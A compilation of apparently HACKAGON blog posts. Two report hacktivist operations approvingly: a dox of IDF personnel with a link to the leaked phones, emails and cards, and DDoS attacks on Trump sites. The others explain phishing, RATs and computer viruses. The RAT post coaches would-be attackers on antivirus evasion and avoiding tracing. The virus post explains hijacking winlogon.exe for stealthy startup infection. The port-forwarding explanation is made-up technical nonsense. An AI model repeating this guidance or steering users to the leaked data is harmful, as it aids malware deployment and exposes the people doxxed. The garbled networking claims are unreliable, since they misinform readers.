Ghost Squad Hackers Leaked Personal Info Of Israel Defence Forces

“Ghost Squad Hackers Leaked Personal Info Of Israel Defence Forces”. The first attack of #OpIsrael started in 2013 when certain branches of the Anonymous hacker collective decided to launch coordinated cyber attacks against Israeli websites on the eve of the Holocaust Remembrance Day, which that year fell on April 8.

Ever since then, the group has been launching similar operations each year, on the same date, and in a recent statement posted on one of its websites, it has said it will continue in 2016 as well. In spite of the fact that, this year, Holocaust Remembrance Day is on May 4, the attacks will still take place on April 7.

Talking to HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group, told that the group Hacked and Leaked Information of Israel Defence Forces at “https://ghostbin.com/paste/m9vxe.

In the leaked information dox, they provided a release of 8,000 IDF family members Phone numbers, Full names and 10,000 personal emails they’ve also included 1000 Israeli IDF soldiers facebook accounts, Israeli Air Force Facebook accounts, and Israeli border Police/Patrol Facebook accounts, And Credit Cards belonging to Israeli IDF family members and IDF soldiers. They have also provided Commanders of Israeli Air Force, Commanders at Israeli Defense Forces. This Data release is in retaliation to the ongoing slaughter and genocide and atrocities committed on the Palestinian people, by the Israeli government set out to conquer Palestine in imperialistic methods of genocide.

Below Are The Sights Of Some Leaked Data.

Important Israeli Targets

Israeli Air Force Pilots and gov Officials list

Israeli Border Police and Patrol

1000 IDF Soldiers

Israeli Credit Cards leaked

Israeli phone number emails leaked

Watch the group’s most recent video on Isreal Cyber Attack here at HACKAGON and follow the conversation across social media at #OpIsreal.

We hope that HACKAGON provided a knowledgeable article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


opTrump Anonymous Declared War against Donald Trump

The Anonymous Group Ghost Squad Hackers Took Down Trumps Websites. “#opTrump – Anonymous Declared War against Donald Trump.” Hacktivist collective Anonymous has threatened to take down 2016 presidential hopeful Donald Trump, this time declaring “Total War” on the GOP frontrunner. Anonymous’ war plan against Trump includes dismantling the candidate’s online presence and digging for dirt on the business tycoon in an attempt to destroy his brand.

According to a video posted on YouTube on March 4th, this plan of attack includes a specific timeline. April 1 was the takedown date for TrumpChicago.com, and Anonymous recruited and still recruiting supporters to aid in its attack.

“Donald Trump, think twice before you speak anything, Said a masked member of Anonymous in a video at the time. “You have been warned.”

In that video, the Anonymous representative makes clear that the group is welcoming all willing participants to join in the group’s so-called war on Trump — with or without hacking experience. “This is a call to protect our future, our freedom and our very way of life,” Reads the hacktivist group member during the video.

Talking to HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group that hacked Ethiopian websites in response to the killing of protesting students, told that the group took down Donald Trump‘s 2 websites “Trump.com” and “trumphotelcollection.com” hosted on CloudFlare and flooded it with DDoS Attacks.

Below is the sight of Attacked “Trump.com” “Trumphotelcollection.com”

trump.com

trumphotelcollection.com

Anonymous’ words for Donald Trump: “Dear Donald Trump, we have been watching you for a long time and what we see is deeply disturbing, Your inconsistent and the hateful campaign has not only shocked the United States of America, you have shocked the entire planet with your appalling actions and ideas.”

Additionally, the group is also aiming to hack some US-based websites — including some famous universities — to send a message to Donald Trump. The hacker told, “The reason we choose universities is, to let the generation know what they are up against and what kind of leader will lead them,”.

It would appear that Anonymous is now ready to scale up its efforts to dismantle Trump’s candidacy, this time with a clearer plan of attack. Watch the group’s most recent video on Trump here at HACKAGON and follow the conversation across social media at #OpTrump.

https://www.youtube.com/watch?v=Ciavyc6bE7A

We hope that HACKAGON provided a knowledgebale article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

 


History says that Phishing Attacks are one of the most common security challenges that both individuals and companies face in keeping their information secure. You should always be careful about giving out personal information over the Internet. Luckily, companies have begun to employ tactics to fight against phishers, but they cannot fully protect you on their own. Remember that you may be targeted almost anywhere online, so always keep an eye out for those “Phishy” schemes and never feel pressurize to give up personal information online.

phishing

What Is Phishing ?

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

Communications purporting to be from popular social websites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.

Different Types Of Phishing Techniques:

1# Spear Phishing: Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is, by far, the most successful on the internet today, accounting for 91% of attacks.

2# Clone Phishing: A type of phishing attack whereby a legitimate, and previously delivered, the email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.

3# Whaling: Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks. In the case of whaling, the masquerading web page/email will take a more serious executive-level form. The content will be crafted to target an upper manager and the person’s role in the company. The content of a whaling attack email is often written as a legal subpoena, customer complaint, or executive issue. Whaling scam emails are designed to masquerade as a critical business email, sent from a legitimate business authority. The content is meant to be tailored for upper management, and usually involves some kind of falsified company-wide concern. Whaling phishers have also forged official-looking FBI subpoena emails and claimed that the manager needs to click a link and install special software to view the subpoena.

4# Link Manipulation: Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are the common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually, this URL points to the “yourbank” (i.e. phishing) section of the example website. Another common trick is to make the displayed text for a link (the text between the <A> tags) suggest a reliable destination when the link actually goes to the phishers’ site. Many email clients or web browsers will show previews of where a link will take the user to the bottom left of the screen while hovering the mouse cursor over a link. This behavior, however, may in some circumstances be overridden by the phisher.

5# Filter Evasion: Phishers have even started using images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. However, this has led to the evolution of more sophisticated anti-phishing filters that are able to recover hidden text in images. These filters use OCR (Optical Character Recognition) to optically scan the image and filter it. Some anti-phishing filters have even used IWR (Intelligent Word Recognition), which is not meant to completely replace OCR, but these filters can even detect cursive, hand-written, rotated (including upside-down text), or distorted (such as made wavy, stretched vertically or laterally, or in different directions) text, as well as text on colored backgrounds.

6# Website Forgery: Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar or by closing the original bar and opening up a new one with the legitimate URL.

An attacker can even use flaws in a trusted website’s own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic because they direct the user to sign in at their bank or service’s own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.

A Universal Man-In-The-Middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.

To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites (a technique known as “Phlashing”). These look much like the real website but hide the text in a multimedia object.

7# Covert Redirect: Covert Redirect is a subtle method to perform phishing attacks that make links appear legitimate, but actually redirect a victim to an attacker’s website. The flaw is usually masqueraded under a login popup based on an affected site’s domain. It can affect OAuth 2.0 and OpenID based on well-known exploit parameters as well. This often makes use of Open Redirect and XSS vulnerabilities in the third-party application websites.

Normal phishing attempts can be easy to spot because the malicious page’s URL will usually be different from the real site link. For Covert Redirect, an attacker could use a real website instead by corrupting the site with a malicious login popup dialogue box. This makes Covert Redirect different from others.

8# Phone Phishing: Not all phishing attacks require a fake website. Messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialed, prompts told users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

9# Tabnabbing: This technique takes advantage of tabbed browsing, with multiple open tabs. This method silently redirects the user to the affected site. This technique operates in reverse to most phishing techniques in that it doesn’t directly take you to the fraudulent site, but instead loads their fake page in one of your open tabs.

10# Evil Twins: This is a phishing technique that is hard to detect. A phisher creates a fake wireless network that looks similar to a legitimate public network that may be found in public places such as airports, hotels or coffee shops. Whenever someone logs on to the bogus network, fraudsters try to capture their passwords and/or credit card information.

Precautions Against Phishing:

  1. Guard Against Spam: Be especially cautious of emails that Come from unrecognized senders and ask you to confirm personal or financial information over the Internet and/or make urgent requests for this information.
  2. Communicate personal information only via phone or secure websites. In fact, When conducting online transactions, look for a sign that the site is secure such as a lock icon on the browser’s status bar or a “https:” URL whereby the “s” stands for “secure” rather than an “http:”.
  3. Beware of phone phishing schemes. Do not divulge personal information over the phone unless you initiate the call. Be cautious of emails that ask you to call a phone number to update your account information as well.
  4. Do not click on links, download files or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them and know what they contain, even if you know the sender.
  5. Never email personal or financial information, even if you are close with the recipient. You never know who may gain access to your email account, or to the person’s account to whom you are emailing.
  6. Beware of links in emails that ask for personal information, even if the email appears to come from an enterprise you do business with. Phishing web sites often copy the entire look of a legitimate web site, making it appear authentic. To be safe, call the legitimate enterprise first to see if they really sent that email to you. After all, businesses should not request personal information to be sent via email.
  7. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are getting the most up-to-date software, and update them all regularly to ensure that you are blocking from new viruses and spyware.
  8. Check your online accounts and bank statements regularly to ensure that no unauthorized transactions have been made.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Phishing Attacks. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We can introduce an RAT (aka Remote Administration Tool) as hacker’s plague spreading tool with a heavy vicious bite. Here, HACKAGON will make you learn everything you need to start the “Plague”. But to go further, we need to clear up the basics first so, here we go.

RATs are the so-called magic wand of Hacker’s.

Remote Administration Tool

What Is Remote Administration Tool?

A Remote Administration Tool (RAT) is a piece of software that allows a remote “Operator” to control a system as if he has physical access to that system. While Desktop Sharing and Remote Administration have many legal uses, “RAT” software is usually associated with the criminal or malicious activities such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it’s active like when a computer is turned on.

How To Spread Remote Administration Tool?

Some RATs can spread over P2P (peer to peer) file sharing services (Torrents mostly), messenger and email spams (MSN, Skype, AIM, etc.) while other may tag along hiding behind some other software. The user installs something, clicks “Next” 5–6 times and voila! Without anyone ever finding out the RAT has compromised a system.

How To Control Remote Administration Tool Server?

Once installed, the RAT server can be controlled via an RAT client. Basically, it’s just an application that tracks your RAT’s movements. It tells you how many systems are infected, information on their system, versions of OS and other software, their IP address etc. It shows a whole list of IP addresses which may be connected to immediately. After connecting, you can make the computer do pretty much anything like you can send keylogger, uninstall their antivirus, crash their whole system, etc.

What is port forwarding?

In computer networking, Port Forwarding or port mapping is an application of Network Address Translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall.

If you’re a gamer or are used to download torrents, you must’ve heard “Port Forwarding” as a way to increase download speeds, reduce lag, etc. In general Port forwarding refers to the redirecting of computer signals to follow specific electronic paths into your computer. The logic behind this shit is, if the computer signal finds its way into your computer a few milliseconds quicker, it will add up to be a possibly dramatic speed increase for your game or your downloading. Don’t start jumping around just yet, your internet connection is probably already optimized for maximum performance (It is so, by default).

Example: A Pencil-thin network cable (that goes into the network adapter) at the back of your computer contains 65,536 microscopic pathways inside it. Your network cable is just like a major highway, except your network cable has freaking 65,536 lanes, and there is a tollbooth on each lane. We call each lane as a “Port”. (FYI, 2^16 = 65,536. So, that tells us 2 bytes = 16 bits in all is sort of the “width” of network cables, which gives us 65,536 different possible combinations – hence, the same number of ports.)

Your internet signal is comprised of millions of tiny little cars that travel on these 65,536 lanes. We call these little cars as “Packets”. These packets can travel as quick as the speed of light, but they do observe a stop-and-go set of rules, where they are required to stop at each major network intersection as if it were a border crossing between countries, or connecting to a different ISP. At each intersection, the packet must do three things:

  • Find an open port.
  • Pass the identification test, that will allow it through that port, and if not.
  • Move to the next port and try again, until it is allowed to pass through the toll.

In some cases, packets sent by hackers will be caught and held at the intersection, where they will then be dissolved into random electrons. When this happens, it is called “Packet Filtering” or “Packet Sniffing”. Likewise, if a hacker gains control of a much-used port, he can control every bit of information that passes through it – Read it, modify or even delete it.

All in all, Port Forwarding is when you command your network router to proactively identify and redirect every packet to travel on specific electronic lanes. Instead of having every packet stop at each port in turn until it finds an open port, a router can be programmed to expedite the process by identifying and redirecting packets without having them stop at each port. Your router then acts like a type of hyper-fast traffic policeman who directs traffic in front of the toll booths.

Can An Antivirus Catch An Remote Administration Tool?

Yes, Actually, Hell Yeah! As a hacker, you will find antiviruses blocking your path at every damn step. But, like every problem, this too has a solution – “Encryption”. It’s called making your server “FUD (Fully Undetectable)”.

Example: Typically encrypted formats, let’s say the password protected .zip or .rar files (if they contain malicious software) can be caught by an Antivirus. Making a program FUD does pretty much the same thing, except it does so like a drunkard with OCD (Obsessive-Compulsive Disorder). What I mean is, running the software through an encryption program again and again so that nothing can recognize what it is and it can pass off as random harmless noise. Something called “Hex Editing” is a well-known way to go about doing this. This is a whole different topic in itself. So, more on this later.

Legal Or Illegal?

Well, some RATs are legal, and some are not. Legal are the ones without a backdoor, and they have the ability to close connection anytime.(Backdoor is something that gives the attacker access to the victim’s system without their knowledge). Plus these are not really referred to as RAT’s, that’s just our (hacker’s) dirty language where the Illegal ones are used for hacking and they may possibly steal data (or worse). A few examples are written below:

Legal:

  1. TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
  2. UltraVNC – Remote support software for on demand remote computer support.
  3. Ammyy Admin – Like TeamViewer, Ammyy Admin is another reliable and friendly tool for remote computer access.
  4. Mikogo – Mikogo is an Online Meeting, Web Conferencing, Remote Support tool where you can share your screen with several participants in real-time over the Web.

The above tools while very useful and very legal, require a green light from both the parties involved. That’s the main difference between the ones above and the ones below:

Illegal (Or Barely Legal):

  1. Spy-Net
  2. Cerberus Rat
  3. CyberGate Rat
  4. SubSeven
  5. Turkojan
  6. ProRat

These all are used for one purpose – Causing trouble, to say the least. RATs like the ones above are meant to be stealthy. After all, no hacker will want their victims to get a message like: “Congratulations! You have been infected!” (Or maybe let the Antivirus find it). Use any of these on an actual victim, and you will get a ticket to jail, or, at least, a fine. But these are actually used, and mostly without anyone ever suspecting anything wrong. The thing is, hacking is becoming much more of a serious business than a game. An RAT that simply crashes the OS or formats the hard disk gives nothing to the attacker, So why bother doing it in the first place? RAT’s today are evolving (pun unintended). They are becoming more like “parasites” instead of predators. They may be used for DDOSing (by creating massive botnets with tens of thousands of slave computers), clicking ads in the background (the usual click fraud), increasing blog and youtube “views”, even using the compromised systems to “earn money online”, by pushing surveys, exploiting the websites which offer a pay-per-install model, even “mining” bitcoins (Bitcoins are just a fancy new online currency. Bitcoins can be earned by devoting CPU power, then converted into real money, hence their potential exploitation by using RATs).

What’s DNS Host?

A DNS Hosting is a service that runs Domain Name System Servers. Most, but not all, domain name registrars include DNS hosting service with registration. Free DNS hosting services also exist. Many third-party DNS hosting services provide Dynamic DNS.

In general, Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates meaningful human understandable Domain Names into the Numerical (Binary) Identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

What Can Remote Administration Tool Do?

  • Manage files (Delete/Modify).
  • Controls Web Browser (Change homepage, open a website, etc.).
  • Get System Information (OS Version, AV name, RAM Memory, Computer name, Network Addresses, etc.).
  • Get Passwords, CC numbers or private data, etc (via Keylogger).
  • View and control remote desktop (Take the screenshot or a snap from the webcam).
  • Record camera, sound (Control mic and camera).
  • Controls victims I/O devices (mouse, keyboard, printer, etc.).

Pretty much everything you can do on your own computer, except play GTA V remotely. (Although technically, you can do that too)

Chances Of Getting Traced?

Yes as well as no because it’s all depends on the slave, it’s really hard to remove the infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace because PC usually got over 300 connections. So don’t worry.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding RAT – Remote Administration Tool.  so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


On contrary to popular belief, Hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. So, for a newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity by Understanding Computer Viruses.

In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise.

Understanding Computer Viruses

Understanding Computer Viruses

Computer Viruses are the malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be “infected”. Viruses are perhaps the oldest form of malicious software (Malware). They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened, they can turn your world upside down in a second.

You need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on the destructiveness power of the payload, Computer Viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many coders of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe but only from the known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is newbie viruses. For an antivirus to be able to guard against newbie viruses, it must first be reported, the virus scanning code must be modified to include this newbie virus, and finally the virus database copy on the client side must be updated.

Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

How do Viruses Works, In General ?

Well, first, the coder writes the executable codes required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the coder want from his virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and co-workers? Making any of this happen requires “executable” code of some kind.

Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code will run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed. As easily avoided as this result seems to be, it still works far more often than it should.

Virus coders have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes the executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code ?

Of course, you know that .exe files are executable, as are other similar file formats such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories:

  • Standalone Programs.
  • The code included within resources or libraries.
  • Script or macro code executed by an interpreter of some kind.

In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked:

  1. Launch the Registry Editor by opening “Run” and type “regedit”.
  2. Expand the “HKEY_CLASSES_ROOT (HKCR)” node – It’s the operating system’s repository for information on file associations and commands and Under this HKCR, you’ll find nodes representing all the file type extensions registered on your computer.
  3. Navigate down the tree until you locate the key named “.exe”.
  4. Select this “.exe” node and observe that its default value (shown in the right-hand pane) is “exefile” – This is a pointer to another node under HKCR (the exefile key).
  5. Scroll down and find the “exefile” folder. The exefile key contains a Shell Subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as “Verbs”. For example, a Microsoft Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu.
  6. Expand the shell subkey for the “exefile” node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open”. (HCKR >> exefile >> shell >> open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys, in turn, has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect — it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of %1 %* This is used in MS-DOS batch file language. The basic idea is that the path and filename of the EXE file you activated are substituted for the “%1” parameter while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1” would tend to pose a risk. There is a number of these, and they’re all potentially dangerous. Considering that the virus coder knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd, .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to, .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble Screen Saver file type (“.scr” extension). Close to the start of the 21st century, “.scr” viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm? So Naive. Again, extension hardly matters, everything a “.exe” virus can do, a “.scr” one can do equally as well. The days of “.scr” might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of “.scr” viruses. The key to the future lies in the past between the shadows.

In the Registry Editor, compare the open verb’s command default value for “EXE” and “SCR” files, respectively. As you will notice, they’re pretty much identical— “%1” %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a “/S” switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the “/S” switch accordingly. There’s nothing to stop a virus writer from giving their application a “.scr” extension and then simply ignoring the “/S” switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, pre-occupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin’s” name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the “CTRL + F”, find function to poke around and feel the power of “regedit”. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous

Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a “%1” command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called “RUNDLL32.exe”.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or another library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus coder’s part.

Scripts and Macros

Increased Flexibility Brings Increased Risk, Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a “.exe” file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example, are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods

The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that doesn’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files

Files with an REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example “.bobo”. But in the registry, there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating.

Luckily, most antivirus software nowadays is adopting the “Sandboxing” technique to run untested files. Basically, the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by, for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straight away.

Path Vulnerabilities

Another hazard is something called the PATH Environment Variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer >> C: Drive >> Program Files >> Mozilla”. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply stores the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry, it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this have to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this! The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of the virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim have got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from its default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup, the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malicious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in destructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious software today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

